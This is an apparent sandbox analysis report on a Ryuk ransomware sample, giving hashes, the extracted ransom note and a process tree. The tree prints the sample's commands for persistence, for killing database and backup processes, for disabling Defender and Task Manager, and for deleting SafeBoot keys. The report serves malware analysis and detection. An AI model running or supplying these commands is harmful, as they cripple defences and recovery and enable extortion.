Overview

overview

10

Static

static

1

Ryuk86.bin.exe

windows7-x64

10

Ryuk86.bin.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    47s
  • max time network
    34s
  • platform
    windows7_x64
  • resource
    win7-20230220-en
  • resource tags

    arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
  • submitted
    09-03-2023 18:31

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Ryuk86.bin.exe

  • Size

    767KB

  • MD5

    d2e194259106bca3b42dc8690d340b59

  • SHA1

    edcd63a3125854ed72cb5811f08644a87e265e3b

  • SHA256

    788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc

  • SHA512

    4cecf1db68cd71b92b2e968719a365397b3ccd16340a952a8901647e9829b0a6e8d4cb1f948fb792f2cc58e4f6e289fd81cb104b43ddc8469c0671935e653a13

  • SSDEEP

    12288:RnBkozA9lzIeVJ+OeO+OeNhBBhhBBUA9CGkIDIP6J9kgnDC3TbqUttRrvCsZ+nt2:jkozAjK95DIP4DCDbq8tRrvB

Score
10/10
ryukdiscoveryevasionransomware

Malware Config

Extracted

Path

C:\ProgramData\RyukReadMe.txt

Ransom Note
Your network has been penetrated. All files on each host in the network have been encrypted with a strong algorithm. Backups were either encrypted Shadow copies also removed, so F8 or any other methods may damage encrypted data but not recover. We exclusively have decryption software for your situation. More than a year ago, world experts recognized the impossibility of deciphering by any means except the original decoder. No decryption software is available in the public. Antiviruse companies, researchers, IT specialists, and no other persons cant help you decrypt the data. DO NOT RESET OR SHUTDOWN - files may be damaged. DO NOT DELETE readme files. To confirm our honest intentions.Send 2 different random files and you will get it decrypted. It can be from different computers on your network to be sure that one key decrypts everything. 2 files we unlock for free To get info (decrypt your files) contact us at [email protected] or [email protected] You will receive btc address for payment in the reply letter Ryuk No system is safe

Signatures

  • Ryuk

    Ransomware distributed via existing botnets, often Trickbot or Emotet.

    ransomwareryuk
  • Disables Task Manager via registry modification
    evasion
  • Drops startup file 3 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
    discovery
  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Kills process with taskkill 2 IoCs
    evasion
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 3 IoCs
    evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe
    "C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe"
    1⤵
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:1348
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1468
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F
        3⤵
        • Creates scheduled task(s)
        PID:932
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
      2⤵
      • Drops startup file
      PID:916
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
      2⤵
        PID:1708
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:568
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F
          3⤵
          • Creates scheduled task(s)
          PID:968
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:472
        • C:\Windows\SysWOW64\attrib.exe
          attrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
          3⤵
          • Drops startup file
          • Views/modifies file attributes
          PID:1328
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe" /RU SYSTEM /RL HIGHEST /F
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:268
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe" /RU SYSTEM /RL HIGHEST /F
          3⤵
          • Creates scheduled task(s)
          PID:524
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe" /F
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:684
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe" /F
          3⤵
          • Creates scheduled task(s)
          PID:1320
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c attrib +h +s ryuk.exe
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:588
        • C:\Windows\SysWOW64\attrib.exe
          attrib +h +s ryuk.exe
          3⤵
          • Views/modifies file attributes
          PID:1240
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\ryuk.exe
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:984
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c start cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
        2⤵
          PID:812
          • C:\Windows\SysWOW64\cmd.exe
            cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
            3⤵
              PID:696
              • C:\Windows\SysWOW64\icacls.exe
                icacls * /grant Everyone:(OI)(CI)F /T /C /Q
                4⤵
                • Modifies file permissions
                PID:604
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
            2⤵
              PID:556
              • C:\Windows\SysWOW64\reg.exe
                reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
                3⤵
                  PID:1356
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c start cmd.exe /c taskkill /t /f /im sql* && taskkill /f /t /im veeam* && taskkill /F /T /IM MSExchange* && taskkill /F /T /IM Microsoft.Exchange* && taskkill /F /T /IM pvx* && taskkill /F /T /IM dbsrv* && exit
                2⤵
                  PID:936
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c Copy hrmlog1 C:\ProgramData\hrmlog1
                  2⤵
                    PID:828
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c Copy hrmlog2 C:\ProgramData\hrmlog2
                    2⤵
                      PID:1640
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c Copy RYUKID C:\ProgramData\RYUKID
                      2⤵
                        PID:1500
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c Copy C:\ProgramData\hrmlog1 %userprofile%\Desktop\hrmlog1
                        2⤵
                          PID:1504
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /c Copy "C:\ProgramData\RyukReadMe.txt " "%userprofile%\Desktop\RyukReadMe.txt "
                          2⤵
                            PID:1728
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                            2⤵
                              PID:1156
                              • C:\Windows\SysWOW64\reg.exe
                                reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                                3⤵
                                  PID:1708
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
                                2⤵
                                  PID:768
                                  • C:\Windows\SysWOW64\reg.exe
                                    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
                                    3⤵
                                      PID:1164
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
                                    2⤵
                                      PID:1580
                                      • C:\Windows\SysWOW64\reg.exe
                                        reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
                                        3⤵
                                          PID:1616
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /c reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
                                        2⤵
                                          PID:1704
                                          • C:\Windows\SysWOW64\reg.exe
                                            reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
                                            3⤵
                                              PID:560
                                        • C:\Windows\SysWOW64\attrib.exe
                                          attrib +h +s C:\ProgramData\ryuk.exe
                                          1⤵
                                          • Views/modifies file attributes
                                          PID:948
                                        • C:\Windows\SysWOW64\taskkill.exe
                                          taskkill /f /t /im veeam*
                                          1⤵
                                          • Kills process with taskkill
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:1544
                                        • C:\Windows\SysWOW64\cmd.exe
                                          cmd.exe /c taskkill /t /f /im sql*
                                          1⤵
                                            PID:1248
                                            • C:\Windows\SysWOW64\taskkill.exe
                                              taskkill /t /f /im sql*
                                              2⤵
                                              • Kills process with taskkill
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:612

                                          Network

                                          MITRE ATT&CK Enterprise v6

                                          Replay Monitor

                                          Loading Replay Monitor...

                                          Downloads

                                          • C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\RyukReadMe.html
                                            Filesize

                                            152B

                                            MD5

                                            a641bf8ac8307aad57ecab53872e67db

                                            SHA1

                                            6fa8d69a859c34b8e75223ed8f426dbdf3d03df7

                                            SHA256

                                            9383b707c654726704f6968a151b67fa564653e91c8f3a31298b8cb81469d2ce

                                            SHA512

                                            7d32498611e54397ee320ab09380356c3470daf8e45e0a41d550df129027ca7279f14ec2b9f1b33d312ddca7b7f446f1c5689cae83502f4144f5807e39dcf5f4

                                            Download Submit

                                          • C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\RyukReadMe.txt
                                            Filesize

                                            1KB

                                            MD5

                                            f69127370e1f1aede86e881dd446f6aa

                                            SHA1

                                            65298f80e3b97f59ea45179463ab9c5cc3ee9337

                                            SHA256

                                            da7ec116558c3b21f68b5842391348e3597704f6f80ad11edeb9cc4fc9cc12bc

                                            SHA512

                                            5e80879ceabb6cb9e19a69d00942cb13989b063b416de55d9a00060b0180f38da0340b154652e6a01b9d48675da24a83b4023db3d20b46ba9729e0b26d98a8d4

                                            Download Submit

                                          • C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe
                                            Filesize

                                            767KB

                                            MD5

                                            d2e194259106bca3b42dc8690d340b59

                                            SHA1

                                            edcd63a3125854ed72cb5811f08644a87e265e3b

                                            SHA256

                                            788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc

                                            SHA512

                                            4cecf1db68cd71b92b2e968719a365397b3ccd16340a952a8901647e9829b0a6e8d4cb1f948fb792f2cc58e4f6e289fd81cb104b43ddc8469c0671935e653a13

                                            Download Submit

                                          • C:\ProgramData\RYUKID
                                            Filesize

                                            8B

                                            MD5

                                            bea6ddd31c498e9f4e9f6bc95923ee3e

                                            SHA1

                                            0cfd17881260146fb9417dbf9694fa6ef2211105

                                            SHA256

                                            8b1a4555eae63973a35fd1727681e65dbfff2bf071ea87aaf6af9fd76548d1b5

                                            SHA512

                                            910998af02ea9f9c6c5156d0a7c247ed14ce6043e712f7cabad00fe9e922e8a1bf4e62963b3da994058257bfa46220b3164a4fceafbabd2cef7ed8631577272f

                                            Download Submit

                                          • C:\ProgramData\RyukReadMe.txt
                                            Filesize

                                            1KB

                                            MD5

                                            f69127370e1f1aede86e881dd446f6aa

                                            SHA1

                                            65298f80e3b97f59ea45179463ab9c5cc3ee9337

                                            SHA256

                                            da7ec116558c3b21f68b5842391348e3597704f6f80ad11edeb9cc4fc9cc12bc

                                            SHA512

                                            5e80879ceabb6cb9e19a69d00942cb13989b063b416de55d9a00060b0180f38da0340b154652e6a01b9d48675da24a83b4023db3d20b46ba9729e0b26d98a8d4

                                            Download Submit

                                          • C:\ProgramData\hrmlog1
                                            Filesize

                                            2KB

                                            MD5

                                            d9876c40c0deeed3a19a371bdc127213

                                            SHA1

                                            86c2e629e33a29ef280896b6415186c119e211e3

                                            SHA256

                                            7436733fab8e99733cdf304ceaeb157e7effe7dfd2d98a5eef747b8ac380f95e

                                            SHA512

                                            00577b55ee16959b5aa81ca6fb924c2facab426e610043e96207440c282253ef80ea52971f97f6cd101e13ec972762c7f834c4fe0cd3ae319b102616f6f85323

                                            Download Submit

                                          • C:\ProgramData\hrmlog1
                                            Filesize

                                            2KB

                                            MD5

                                            d9876c40c0deeed3a19a371bdc127213

                                            SHA1

                                            86c2e629e33a29ef280896b6415186c119e211e3

                                            SHA256

                                            7436733fab8e99733cdf304ceaeb157e7effe7dfd2d98a5eef747b8ac380f95e

                                            SHA512

                                            00577b55ee16959b5aa81ca6fb924c2facab426e610043e96207440c282253ef80ea52971f97f6cd101e13ec972762c7f834c4fe0cd3ae319b102616f6f85323

                                            Download Submit

                                          • C:\ProgramData\hrmlog1
                                            Filesize

                                            2KB

                                            MD5

                                            d9876c40c0deeed3a19a371bdc127213

                                            SHA1

                                            86c2e629e33a29ef280896b6415186c119e211e3

                                            SHA256

                                            7436733fab8e99733cdf304ceaeb157e7effe7dfd2d98a5eef747b8ac380f95e

                                            SHA512

                                            00577b55ee16959b5aa81ca6fb924c2facab426e610043e96207440c282253ef80ea52971f97f6cd101e13ec972762c7f834c4fe0cd3ae319b102616f6f85323

                                            Download Submit

                                          • C:\ProgramData\hrmlog2
                                            Filesize

                                            292B

                                            MD5

                                            f3642fa051609bd3e193a24379b547ec

                                            SHA1

                                            920dca74fd4c08cc17cadf3d7a5169f201296075

                                            SHA256

                                            580771d1987a4bfaf0a917d72ffc3c65e7f83165125f1b15571cf78126c959eb

                                            SHA512

                                            24b5cef7665e9b85e0b5406f2c8fd7cc2134c96f088e436eb3f6ede566a235b5177d80e97339057e1726c6fe7821f931ab8341041f3aebaffd718efe3411f240

                                            Download Submit

                                          • C:\ProgramData\hrmlog2
                                            Filesize

                                            292B

                                            MD5

                                            f3642fa051609bd3e193a24379b547ec

                                            SHA1

                                            920dca74fd4c08cc17cadf3d7a5169f201296075

                                            SHA256

                                            580771d1987a4bfaf0a917d72ffc3c65e7f83165125f1b15571cf78126c959eb

                                            SHA512

                                            24b5cef7665e9b85e0b5406f2c8fd7cc2134c96f088e436eb3f6ede566a235b5177d80e97339057e1726c6fe7821f931ab8341041f3aebaffd718efe3411f240

                                            Download Submit

                                          • C:\ProgramData\hrmlog2
                                            Filesize

                                            292B

                                            MD5

                                            f3642fa051609bd3e193a24379b547ec

                                            SHA1

                                            920dca74fd4c08cc17cadf3d7a5169f201296075

                                            SHA256

                                            580771d1987a4bfaf0a917d72ffc3c65e7f83165125f1b15571cf78126c959eb

                                            SHA512

                                            24b5cef7665e9b85e0b5406f2c8fd7cc2134c96f088e436eb3f6ede566a235b5177d80e97339057e1726c6fe7821f931ab8341041f3aebaffd718efe3411f240

                                            Download Submit

                                          • C:\ProgramData\ryuk.exe
                                            Filesize

                                            767KB

                                            MD5

                                            d2e194259106bca3b42dc8690d340b59

                                            SHA1

                                            edcd63a3125854ed72cb5811f08644a87e265e3b

                                            SHA256

                                            788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc

                                            SHA512

                                            4cecf1db68cd71b92b2e968719a365397b3ccd16340a952a8901647e9829b0a6e8d4cb1f948fb792f2cc58e4f6e289fd81cb104b43ddc8469c0671935e653a13

                                            Download Submit

                                          • C:\Users\Admin\AppData\Local\Temp\RYUKID
                                            Filesize

                                            8B

                                            MD5

                                            bea6ddd31c498e9f4e9f6bc95923ee3e

                                            SHA1

                                            0cfd17881260146fb9417dbf9694fa6ef2211105

                                            SHA256

                                            8b1a4555eae63973a35fd1727681e65dbfff2bf071ea87aaf6af9fd76548d1b5

                                            SHA512

                                            910998af02ea9f9c6c5156d0a7c247ed14ce6043e712f7cabad00fe9e922e8a1bf4e62963b3da994058257bfa46220b3164a4fceafbabd2cef7ed8631577272f

                                            Download Submit

                                          • C:\Users\Admin\AppData\Local\Temp\hrmlog1
                                            Filesize

                                            2KB

                                            MD5

                                            d9876c40c0deeed3a19a371bdc127213

                                            SHA1

                                            86c2e629e33a29ef280896b6415186c119e211e3

                                            SHA256

                                            7436733fab8e99733cdf304ceaeb157e7effe7dfd2d98a5eef747b8ac380f95e

                                            SHA512

                                            00577b55ee16959b5aa81ca6fb924c2facab426e610043e96207440c282253ef80ea52971f97f6cd101e13ec972762c7f834c4fe0cd3ae319b102616f6f85323

                                            Download Submit

                                          • C:\Users\Admin\AppData\Local\Temp\hrmlog2
                                            Filesize

                                            292B

                                            MD5

                                            f3642fa051609bd3e193a24379b547ec

                                            SHA1

                                            920dca74fd4c08cc17cadf3d7a5169f201296075

                                            SHA256

                                            580771d1987a4bfaf0a917d72ffc3c65e7f83165125f1b15571cf78126c959eb

                                            SHA512

                                            24b5cef7665e9b85e0b5406f2c8fd7cc2134c96f088e436eb3f6ede566a235b5177d80e97339057e1726c6fe7821f931ab8341041f3aebaffd718efe3411f240

                                            Download Submit

                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe
                                            Filesize

                                            767KB

                                            MD5

                                            d2e194259106bca3b42dc8690d340b59

                                            SHA1

                                            edcd63a3125854ed72cb5811f08644a87e265e3b

                                            SHA256

                                            788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc

                                            SHA512

                                            4cecf1db68cd71b92b2e968719a365397b3ccd16340a952a8901647e9829b0a6e8d4cb1f948fb792f2cc58e4f6e289fd81cb104b43ddc8469c0671935e653a13

                                            Download Submit